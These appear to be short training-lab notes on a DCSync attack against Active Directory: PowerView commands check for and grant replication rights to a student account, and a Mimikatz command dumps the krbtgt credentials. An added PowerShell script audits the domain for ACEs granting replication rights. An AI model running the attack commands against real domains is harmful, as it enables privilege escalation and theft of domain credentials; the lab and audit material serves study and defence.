Check if user has replication rights

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "student648") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

Adding rights

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName student648 -Rights DCSync -Verbose
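
Auditing the same ACL from the defender's side, as an added example (not part of the original notes): it lists every principal on the domain head that holds a replication extended right, all extended rights, or GenericAll, and flags any that fall outside an expected baseline. It assumes the RSAT ActiveDirectory module; the $Expected baseline and the variable names are assumptions to adjust per environment.

```powershell
# Added example: audit the domain head for ACEs that permit directory replication (DCSync).
# Assumes the RSAT ActiveDirectory module, which provides the AD: drive.
Import-Module ActiveDirectory

$DomainDN = 'dc=dollarcorp,dc=moneycorp,dc=local'   # domain used in the commands above

# Control access right GUIDs for replication. DCSync of password data needs
# Get-Changes together with Get-Changes-All.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Assumed baseline of principals that normally hold these rights (not from the page).
$Expected = 'Domain Controllers', 'Enterprise Domain Controllers',
            'Enterprise Read-only Domain Controllers', 'Administrators',
            'Domain Admins', 'Enterprise Admins', 'SYSTEM'

$ExtendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$GenericAll    = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll

$findings = foreach ($ace in (Get-Acl -Path "AD:\$DomainDN").Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }

    $guid  = $ace.ObjectType.ToString()
    $right = $null
    if ($ace.ActiveDirectoryRights.HasFlag($GenericAll)) {
        $right = 'GenericAll'
    } elseif ($ace.ActiveDirectoryRights.HasFlag($ExtendedRight)) {
        if ($ReplicationRights.ContainsKey($guid)) {
            $right = $ReplicationRights[$guid]
        } elseif ($ace.ObjectType -eq [Guid]::Empty) {
            $right = 'All extended rights'   # an empty ObjectType covers replication too
        }
    }
    if (-not $right) { continue }

    # Compare on the account name without its domain or authority prefix
    $leaf = ($ace.IdentityReference.Value -split '\\')[-1]
    [pscustomobject]@{
        Principal  = $ace.IdentityReference.Value
        Right      = $right
        Inherited  = $ace.IsInherited
        Unexpected = $Expected -notcontains $leaf
    }
}

$findings | Sort-Object Unexpected -Descending | Format-Table -AutoSize
```

A user account such as student648 appearing with Unexpected = True is the footprint left by the Add-ObjectAcl step above.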

Dumping Creds

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
